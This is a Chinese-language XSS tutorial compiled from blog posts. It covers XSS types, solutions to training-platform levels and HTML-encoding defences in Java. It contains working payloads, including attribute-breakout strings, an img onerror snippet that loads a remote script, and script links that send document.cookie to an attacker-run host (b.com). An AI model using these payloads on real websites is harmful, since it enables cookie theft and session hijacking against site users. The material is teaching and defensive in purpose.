XSS漏洞详解
 
一、XSS漏洞基础讲解
1.1 认识XSS
1.2 跨站脚本
1.3 XSS的分类
1.3.1 反射型
1.3.2 存储型
1.3.3 DOM型
   
1.4 XSS的危害
1.5 火狐中常用的XSS调试插件
1.5.1 Hackbar
1.5.2 Firebug
1.5.3 Tamper Date
1.5.4 Live HTTP Headers
1.5.5 Editor Cookie
  
  
二、XSS漏洞挖掘与绕过
三、XSS漏洞的综合利用

 
一、XSS漏洞基础讲解
 
1.1 认识XSS
 
Cross-Site Scripting 简称为“CSS”，为避免与前端叠成样式表的缩写"CSS"冲突，故又称XSS。
 XSS漏洞一直被评估为web漏洞中危害较大的漏洞，在OWASP TOP10的排名中一直属于前三的江湖地位。
 XSS是一种发生在前端浏览器端的漏洞，所以其危害的对象也是前端用户。
 OWASP是开源web安全应用项目，我们做安全也好，做渗透也好，这个一定要记住，大家应该都知道它定义了全世界10大漏 洞，我们现在做安全的话，主要依据两种标准，一个是OWASP安全测试标准，还有一个是ISO / IEC 27001是一个信息安全标准，有一本书叫《OWASP渗透测试指南》，虽然比较老，但是比较经典，很多公司都在用这个标准做测试。
 现在的话，XSS危害相当大，现在已讲到XSS，大家最直观可能是弹个框，但是不能这么片面的认为XSS就是弹框，XSS弹框主要是验证一下是否存在XSS漏洞，它一旦弹框就说明它把咱们构造的JS代码执行了，它其实就是执行恶意的JS代码，来攻击客户端浏览器的，xss最大的特点就是能注入恶意的代码到用户浏览器的网页上，从而达到劫持用户会话的目的。
 
1.2 跨站脚本
 
一种经常出现在web应用程序中的计算机安全漏洞，是由于web应用程序对用户的输入过滤不严而产生的。攻击者利用网站漏洞把恶意的脚本代码注入到网页中，当其他用户浏览这些网页时，就会执行其中的恶意代码，对受害用户可能采用cookie资料窃取，会话劫持，钓鱼欺骗等攻击手段。
 
1.3 XSS的分类
 
1.3.1 反射型
 
反射型xss一般出现在URL参数中及网站搜索栏中，由于需要点击包含恶意代码的URL才可以触发，并且只能触发一次，所以也被称为“非持久性xss”。
 
 图1-14是其攻击流程，可以看到攻击者将含有恶意脚本的XSS链接通过email的方式发送给目标用户，当用户访问该链接时， 服务器接收用户的请求并处理，然后服务器把带有XSS的数据发给用户浏览器，浏览器解析这个恶意脚本，就会触发XSS漏洞。
 
1.3.2 存储型
 
存储型xss一般会出现在网站留言板，评论处，个人资料处，等需要用户可以对网站写入数据的地方。也被称作“持久性xss”。存储型XSS比反射型更具威胁性，并且可能影响到web服务器自身的安全。
 
 上图是其攻击流程，比如一个论坛评论处由于对用户输入过滤不严格，导致攻击者在写入一段窃取cookie的恶意JavaScript代码到评论处，这段恶意代码会写入数据库，当其他用户浏览这个写入代码的页面时，网站从数据库中读取恶意代码显示到网页中被浏览器执行，导致用户cookie被窃取，有多少人访问，机会攻击多少人，攻击者无需受害者密码即可登录账户。
 
1.3.3 DOM型
 
DOM XSS是基于dom文档对象模型，前端脚本通过dom动态修改页面，由于不与服务端进行交互，而且代码是可见的，从前端获取dom中的数据在本地执行。也就是说，客户端的脚本程序可以通过DOM动态修改页面内容，从客户端获取DOM中的数据并在本地执行。
 常见的可以操纵dom的对象：URL，localtion,referrer等
 
 攻击方式：用户请求一个经过专门设计的URL，它有攻击者提交，其中包含XSS代码，服务器的响应不会以任何形式包含攻击者的脚本。当用户的浏览器处理这个响应时，DOM对象就会处理XSS代码，导致含有XSS漏洞。
 
1.4 XSS的危害
 
网页挂马
窃取用户浏览请回话
传播跨站脚本蠕虫等
强制弹出广告页面、刷流量
提升用户权限，进一步渗透网站
网络钓鱼，包括盗取各类的用户账号
窃取用户cookie，cookie会存放用户登录密码凭证，如果cookie被盗取，可以欺骗浏览器访问登录后的页面
。。。。。。
 注：XSS主要是和JS打交道，所以我们要对JS有所了解，简单来说，JS一般会嵌套在HTML中，应用到客户端浏览器上，一般它的特效比较牛皮，JS变量，流程控制，switch流程，for循环，函数，事件，DOM文件对象模型，你如果想把XSS搞明白，就多去w3school学习学习JS的基础知识。
 
1.5 火狐中常用的XSS调试插件
 
1.5.1 Hackbar
 
 
1.5.2 Firebug
 
 
1.5.3 Tamper Date
 
(相当于一个抓包的工具，之前我们不用burpsuite时，就用它抓包）
 
 
1.5.4 Live HTTP Headers
 
 
1.5.5 Editor Cookie
 
 
二、XSS漏洞挖掘与绕过
 
三、XSS漏洞的综合利用

 xss漏洞的自我总结：
 

 
 
 

 （1）    xss漏洞一般存在于输入框、URL栏。只要网站能够运行js，并且有输入框、通过第三方上传文件的都可能存在xss漏洞。
 

 （2）    xss漏洞的原理。通过将恶意的代码与正常的代码进行拼接成我们想要执行的代码。
 

 （3）    一般来说我只要能够让他运行我们所上传的代码，就代表存在xss漏洞。（一开始练习的时候，用alert弹窗，能够快速的检查我们的代码有没有运行成功）。
 

 （4）    最基础的xss漏洞：<script>alert(‘xss’)<script>. 这是一段js代码，目的是让他弹一个显示有xss的弹框。
 

 （5）    有的网站他屏蔽了<>，这样就不能运行script了，但我们可以使用on事件。Onload页面加载事件、onclick点击事件、onmousemove移动事件、onmouseover悬浮事件等。
 

 （6）    出来input标签以外，还可以使用<a> </a> 、<img> </img>标签等都可能xss漏洞攻击
 

 （7）    xss比较重要的有两点（个人总结）：1.闭合前面的代码。  2.网站过滤了那些标签
 
 

 
 
 

 Xss漏洞平台训练：
 

 
 
 

 （1）第一题相对比较简单 将URL栏最后的name=test修改成name=<script>alert(‘xss’)<sctipt> ,就可以弹出框了，需要攻击的时候，直接在当中插入攻击的恶意代码就行了。
 

 
 
 

 （2）第二道题我们先输入 <script>alert(‘xss’)</script>  提交后显示不对，我们打开页面的源代码看看，看到我们输入的<>的地方并不是<> 而是其他的东西，这说明他将<>给屏蔽了，只要遇到<>到会变成其他的东西。可以使用on事件来运行xss，这里运用onclick。 在源代码中看到我们输入的东西是在value当中的，可以先使用一个 ” 来让这个value标签闭合，因为在value中的只会显示不会执行。闭合之后构造代码 οnclick=alert（'xss’）。完整的代码为：  “onclick =alert(‘xss’)   ，点击提交，在店一下输入框（因为这是点击事件）就完成了。
 

 
 
 

 （3）第三道题依旧先输入 <script>alert(‘xss’)</script> ,然后在源代码中看，我们发现<>  “ 分别都被屏蔽了，所以不能用<script>了，我们尝试on事件，先构造一个value的闭合 ‘ (因为value开始的时候使用的是 ‘ )，然后使用onclick事件 ‘οnclick=alert(‘xss’),我们发现结尾多了一个，可以改成 ‘οnclick=’alert(‘xss’) ，因为结尾多了一个，前面加一个使他配对，再提交还是不对，看源代码也没有错。也许是浏览器的原因，我们将xss换成1，结果为： ‘οnclick=’alert(1)   点击提交，在点击输入框，就完成了。
 

 
 
 

 （4）第四题依旧先输入 <script>alrt(‘xss’)</script> 来测试，然后看源码，发现屏蔽了 <> ，所以使用on事件，先构造以个value的闭合，然后先on事件 ，最后让结尾多出来的一个 “ 配对就行了。结果为：  “οnclick=”alert(‘xss’) ,提交在点击输入框。
 

 
 
 
（5）依旧先输入<script>alert(‘xss’)</script>  发现屏蔽了<> ，我们换on事件来看看，οnclick=alert(‘xss’)，结果发现他将on给屏蔽了，所以我们不能使用on事件了，但我还有其他的标签可以使用。我们这里使用 <a> 标签，先用 “> 来闭合input标签，然后用<a> 标签的href属性来构造弹框，结果为：  “><a href=javascript:alert(‘xss’)>ss</a> ,点击提交，在点击屏幕上的ss，就完成了。
 
 
 

XSS（Cross Site Scripting）攻击全称跨站脚本攻击，XSS是一种在web应用中的计算机安全漏洞，它允许恶意web用户将代码植入到提供给其它用户使用的页面中。xss就是在页面执行你所要执行的js。
 
Fuzz testing 模糊测试
 
 
 
point：“xss盲打”，“xss编码绕过”，“fuzzing xss”
 
 
 
参考
 
https://blog.csdn.net/u011781521/article/details/53894399
 
 
 
http://www.freebuf.com/articles/web/40520.html
 
 
 
xss攻击大全？
 
http://www.freebuf.com/author/Black-Hole
 
 
 
 
 
 
 
1：xss攻击可以分成两种类型：
 
 
 
1）.非持久型攻击
 
2）.持久型攻击
 
 
 
非持久型xss攻击：顾名思义，非持久型xss攻击是一次性的，仅对当次的页面访问产生影响。非持久型xss攻击要求用户访问一个被攻击者篡改后的链接，用户访问该链接时，被植入的攻击脚本被用户游览器执行，从而达到攻击目的。
 
 
 
持久型xss攻击：持久型xss，会把攻击者的数据存储在服务器端，攻击行为将伴随着攻击数据一直存在。
 
 
 
反射型：经过后端，不经过数据库
 
 
 
存储型：经过后端，经过数据库
 
 
 
DOM：不经过后端,DOM—based XSS漏洞是基于文档对象模型Document Objeet Model,DOM)的一种漏洞,dom – xss是通过url传入参数去控制触发的。
 
 
 
 
 
2：可以通过闭合html标签，增加onclick，onerror函数来实现各种操作
 
 
 
 
 
3：xss的利用
 
插入jsdaima
 
<script scr="js_url"></script>
 
<img src=x οnerrοr=appendChild(createElement('script')).src='js_url' />

       本文来自：高爽|Coder，原文地址：http://blog.csdn.net/ghsau/article/details/17027893，转载请注明。
        XSS又称CSS，全称Cross SiteScript，跨站脚本攻击，是Web程序中常见的漏洞，XSS属于被动式且用于客户端的攻击方式，所以容易被忽略其危害性。其原理是攻击者向有XSS漏洞的网站中输入(传入)恶意的HTML代码，当其它用户浏览该网站时，这段HTML代码会自动执行，从而达到攻击的目的。如，盗取用户Cookie、破坏页面结构、重定向到其它网站等。
 
XSS攻击
 
       XSS攻击类似于SQL注入攻击，攻击之前，我们先找到一个存在XSS漏洞的网站，XSS漏洞分为两种，一种是DOM Based XSS漏洞，另一种是Stored XSS漏洞。理论上，所有可输入的地方没有对输入数据进行处理的话，都会存在XSS漏洞，漏洞的危害取决于攻击代码的威力，攻击代码也不局限于script。
 
DOM Based XSS
 
       DOM Based XSS是一种基于网页DOM结构的攻击，该攻击特点是中招的人是少数人。
 
       场景一：
 
       当我登录a.com后，我发现它的页面某些内容是根据url中的一个叫content参数直接显示的，猜测它测页面处理可能是这样，其它语言类似： 
 
 
<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>
 
<!DOCTYPEhtmlPUBLIC"-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd">
 
<html>
 
    <head>
 
       <title>XSS测试</title>
 
    </head>
 
    <body>
 
       页面内容：<%=request.getParameter("content")%>
 
    </body>
 
</html>
 
      我知道了Tom也注册了该网站，并且知道了他的邮箱(或者其它能接收信息的联系方式)，我做一个超链接发给他，超链接地址为：http://www.a.com?content=<script>window.open(“www.b.com?param=”+document.cookie)</script>，当Tom点击这个链接的时候(假设他已经登录a.com)，浏览器就会直接打开b.com，并且把Tom在a.com中的cookie信息发送到b.com，b.com是我搭建的网站，当我的网站接收到该信息时，我就盗取了Tom在a.com的cookie信息，cookie信息中可能存有登录密码，攻击成功！这个过程中，受害者只有Tom自己。那当我在浏览器输入a.com?content=<script>alert(“xss”)</script>，浏览器展示页面内容的过程中，就会执行我的脚本，页面输出xss字样，这是攻击了我自己，那我如何攻击别人并且获利呢？
 
Stored XSS
 
       Stored XSS是存储式XSS漏洞，由于其攻击代码已经存储到服务器上或者数据库中，所以受害者是很多人。
 
       场景二：
 
       a.com可以发文章，我登录后在a.com中发布了一篇文章，文章中包含了恶意代码，<script>window.open(“www.b.com?param=”+document.cookie)</script>，保存文章。这时Tom和Jack看到了我发布的文章，当在查看我的文章时就都中招了，他们的cookie信息都发送到了我的服务器上，攻击成功！这个过程中，受害者是多个人。
        Stored XSS漏洞危害性更大，危害面更广。
 
XSS防御
 
       我们是在一个矛盾的世界中，有矛就有盾。只要我们的代码中不存在漏洞，攻击者就无从下手，我们要做一个没有缝的蛋。XSS防御有如下方式。
 
完善的过滤体系
 
       永远不相信用户的输入。需要对用户的输入进行处理，只允许输入合法的值，其它值一概过滤掉。
 
Html encode
 
       假如某些情况下，我们不能对用户数据进行严格的过滤，那我们也需要对标签进行转换。
 
 
less-than character (<)
 
 
&lt;
 
 
greater-than character (>)
 
 
&gt;
 
 
ampersand character (&)
 
 
&amp;
 
 
double-quote character (")
 
 
&quot;
 
 
space character( )
 
 
&nbsp;
 
 
Any ASCII code character whose code is greater-than or equal to 0x80
 
 
&#<number>, where <number> is the ASCII character value.
 
      比如用户输入：<script>window.location.href=”http://www.baidu.com”;</script>，保存后最终存储的会是：&lt;script&gt;window.location.href=&quot;http://www.baidu.com&quot;&lt;/script&gt;在展现时浏览器会对这些字符转换成文本内容显示，而不是一段可执行的代码。
 
其它
 
       下面提供两种Html encode的方法。
 
使用Apache的commons-lang.jar 
  
 
StringEscapeUtils.escapeHtml(str);// 汉字会转换成对应的ASCII码，空格不转换
 
自己实现转换，只转换部分字符 
  
 
private static String htmlEncode(char c) {
 
    switch(c) {
 
       case '&':
 
           return "&amp;";
 
       case '<':
 
           return "&lt;";
 
       case '>':
 
           return "&gt;";
 
       case '"':
 
           return "&quot;";
 
       case ' ':
 
           return "&nbsp;";
 
       default:
 
           return c + "";
 
    }
 
}
 
 
 
/** 对传入的字符串str进行Html encode转换 */
 
public static String htmlEncode(String str) {
 
    if (str ==null || str.trim().equals(""))   return str;
 
    StringBuilder encodeStrBuilder = new StringBuilder();
 
    for (int i = 0, len = str.length(); i < len; i++) {
 
       encodeStrBuilder.append(htmlEncode(str.charAt(i)));
 
    }
 
    return encodeStrBuilder.toString();
 
}
 
       (完) 
 
       本文来自：高爽|Coder，原文地址：http://blog.csdn.net/ghsau/article/details/17027893，转载请注明。